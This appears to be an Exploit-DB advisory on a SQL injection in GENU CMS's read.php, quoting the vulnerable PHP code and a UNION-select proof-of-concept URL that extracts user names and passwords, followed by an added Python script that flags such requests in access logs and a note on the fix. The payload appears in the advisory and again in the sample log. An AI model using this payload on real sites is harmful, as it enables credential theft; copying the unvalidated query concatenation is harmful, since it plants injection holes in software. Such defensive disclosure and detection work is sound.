GENU CMS – SQL Injection

  • Author: hordcode security
    Date: 2012-04-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18708/
  • -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    GENU CMS SQL Injection Vulnerability
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    
    bug found by h0rd h0rd[at]null.net
    homepage http://h0rd.net
    download http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
    vulnerability in read.php
    vulnerable code:
    [...]
    include('./../includes/common.php');
    
    page_header($lang['ARTICLES_READ_TITLE']);
    
    if (isset($_GET['article_id']))
    {
    // $_GET['article_id'] is concatenated into the query unquoted and without
    // any integer validation, so the parameter controls the rest of the statement.
    $sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
     FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
     WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
     AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']);
    $table_articles = $sql->fetch();
    [...]
    
    PoC exploit:
    http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
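The flaw above is that read.php never checks that article_id is an integer before concatenating it. The following script is an added example (not part of the advisory or of GENU) that applies that same integer rule to web-server access logs, so a defender can find requests to read.php whose article_id would have reached the SQL sink unvalidated. The log lines and IP addresses are constructed samples; the path /articles/read.php and the parameter name come from the advisory.

```python
"""Flag read.php requests whose article_id is not a plain integer.

Added example, not GENU code. The log lines below are constructed samples
in Combined Log Format; the only payload used is the advisory's own PoC.
"""
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [05/Apr/2012:10:00:01 +0000] "GET /articles/read.php?article_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Apr/2012:10:00:07 +0000] "GET /articles/read.php?article_id=null%20union%20select%201,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5%20from%20genu_users-- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Apr/2012:10:01:13 +0000] "GET /articles/read.php?article_id=abc HTTP/1.1" 200 5300 "-" "curl/7.21"
198.51.100.9 - - [05/Apr/2012:10:01:20 +0000] "GET /index.php HTTP/1.1" 200 2100 "-" "curl/7.21"
"""

# Combined Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)


def is_valid_article_id(value: str) -> bool:
    """The check read.php should perform before using article_id in SQL:
    a plain non-negative integer of reasonable length, nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def suspicious_requests(log_text: str):
    """Return (ip, timestamp, decoded article_id) for each read.php request
    whose article_id fails the integer check."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/read.php"):
            continue  # only the vulnerable script is of interest
        # parse_qs percent-decodes the values, so the check sees what PHP saw.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("article_id", []):
            if not is_valid_article_id(raw):
                hits.append((m.group("ip"), m.group("ts"), raw))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} article_id={value!r}")
```

The same `is_valid_article_id` rule is what the fix in read.php amounts to: reject or cast the parameter before it reaches the query, or bind it as an integer in a prepared statement.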